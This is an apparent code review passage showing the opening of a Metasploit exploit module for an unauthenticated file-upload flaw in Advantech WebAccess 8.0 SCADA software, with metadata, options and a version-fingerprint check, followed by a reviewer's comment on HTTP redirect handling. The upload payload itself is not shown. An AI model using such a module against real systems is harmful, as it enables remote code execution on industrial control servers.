modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb

```diff
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
+      'Description'    => %q{
+         This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
+         This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
+         of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
+         The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
+         the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
+         upload arbitrary code (instead of an image) to the server, which will then be executed under the
+         high-privilege context of the IIS AppPool.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+        'rgod', # Vulnerability discovery
+        'Zhou Yu <504137480[at]qq.com>' # MSF module
+      ],
+      'References'     => [
+        [ 'CVE', '2016-0854' ],
+        [ 'ZDI', '16-128' ],
+        [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
+      ],
+      'Platform'      => 'win',
+      'Targets'       => [
+        ['Advantech WebAccess 8.0', {}]
+      ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Feb 5 2016",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/'])
+      ], self.class)
+  end
+
+  def version_match(data)
+    # Software Build : 8.0-2015.08.15
+    fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
+    fingerprint['version'] unless fingerprint.nil?
+  end
+
+  def vuln_version?
+    res = send_request_cgi(
```

Comment:
I am guessing the dot is the reason you got a 400, right? It doesn't look like send_request_cgi! is adding the dot at the beginning of the path:

```ruby
  def redirection
    begin
      URI(headers['Location'])
    rescue ::URI::InvalidURIError
      nil
    end
  end
```

```ruby
...
    location = res.redirection
    return res if location.nil?

    opts['redirect_uri'] = location
    opts['uri'] = location.path
```

So either that comes from the HTTP header (which is weird), or........ it's a typo???